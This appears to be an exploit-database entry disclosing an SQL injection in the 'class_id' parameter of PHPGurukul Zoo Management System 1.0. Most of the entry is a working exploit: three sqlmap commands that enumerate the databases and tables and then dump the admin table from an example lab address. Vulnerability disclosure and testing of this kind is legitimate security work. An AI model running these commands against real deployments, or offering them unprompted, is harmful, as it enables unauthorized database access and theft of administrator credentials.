zdt D4rkP0w4r 1337DAY-ID-37612
History: Apr 08, 2022 - 12:00 a.m.

PHPGurukul Zoo Management System 1.0 SQL Injection Vulnerability

2022-04-08 00:00:00
D4rkP0w4r
0day.today

EPSS: 0.002 (Low), percentile 56.2%

# Zoo Management System SQL Injection
# Author: D4rkP0w4r 
* Description: SQL injection in the `class_id` parameter at `/animals?class_id=1`
* Injection Point

http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1

# Exploit 
* Exploit with sqlmap

```
python3 sqlmap.py -u "http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1" --dbs

python3 sqlmap.py -u "http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1" --tables -D zoomanagement

python3 sqlmap.py -u "http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1" --columns -D zoomanagement -T admin --dump
```

# Vulnerable Code

* `class_id` is passed to the database without any filtering
